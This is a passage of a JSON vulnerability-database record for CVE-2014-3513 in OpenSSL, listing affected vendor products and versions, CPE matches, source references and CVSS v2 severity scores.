        "version": null
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "aspera point to point",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.3"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "msr50",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.7.7"
      },
      {
        "model": "xcode",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0"
      },
      {
        "model": "switch series r2111p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11900"
      },
      {
        "model": "f1000-a r3734p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "hsr6602 russian version r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10"
      },
      {
        "model": "aspera orchestrator",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.10"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8300"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "hsr6800 russian version r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.1.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.4"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3"
      },
      {
        "model": "project openssl 1.0.0n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.4.0"
      },
      {
        "model": "ei switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51300"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "tivoli dynamic workload console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59200"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "y",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "u",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "insight control",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "4210g switch series r2221p08",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.4.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3.1"
      },
      {
        "model": "tivoli dynamic workload console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.34"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aspera proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "server migration pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.2"
      },
      {
        "model": "4210g switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "m220",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56002"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.5"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "f5000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aspera ondemand for amazon",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "virtual connect enterprise manager sdk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "ei switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55000"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.9"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.36.3.1.0"
      },
      {
        "model": "aura system manager sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "project openssl 0.9.8o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.2"
      },
      {
        "model": "server migration pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "project openssl e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1886"
      },
      {
        "model": "msr20-1x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aspera cargo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59000"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.5"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.2"
      },
      {
        "model": "msr2000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "mcp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66000"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125000"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75000"
      },
      {
        "model": "qradar siem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19200"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "aura utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.1"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8677"
      },
      {
        "model": "si switch series r1513p95",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5120"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.2"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.8.5"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.1"
      },
      {
        "model": "f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl 0.9.8s",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "qradar risk manager mr2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "switch series r1005p15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12900"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.0"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "aura utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "office connect p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "aspera orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "r2507p34",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "netscaler service delivery appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "f1000-s r3734p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "matrix operating environment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "project openssl beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "msr50 g2 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "manager for sle sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "111.7"
      },
      {
        "model": "studio onsite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "1.3"
      },
      {
        "model": "msr20-1x russian version 2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "secblade ssl vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66020"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.7"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.0"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "tivoli workload scheduler distributed fp04",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66020"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "60000"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.0"
      },
      {
        "model": "office connect pl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "msr20 russian version 2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "secblade fw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "u200a and m f5123p30",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "switch series (comware r1208p10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v5)"
      },
      {
        "model": "4510g switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.1"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "vsr1000 r0204p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "switch series r2311p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5920"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.4"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "8.4"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.4"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.3"
      },
      {
        "model": "security virtual server protection for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-476"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2"
      },
      {
        "model": "project openssl 0.9.8u",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.1"
      },
      {
        "model": "ei switch series r3108p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5130"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70585"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "HP",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "129932"
      },
      {
        "db": "PACKETSTORM",
        "id": "130541"
      },
      {
        "db": "PACKETSTORM",
        "id": "132082"
      },
      {
        "db": "PACKETSTORM",
        "id": "137201"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2014-3513",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2014-3513",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-3513",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2014-3513",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3513"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
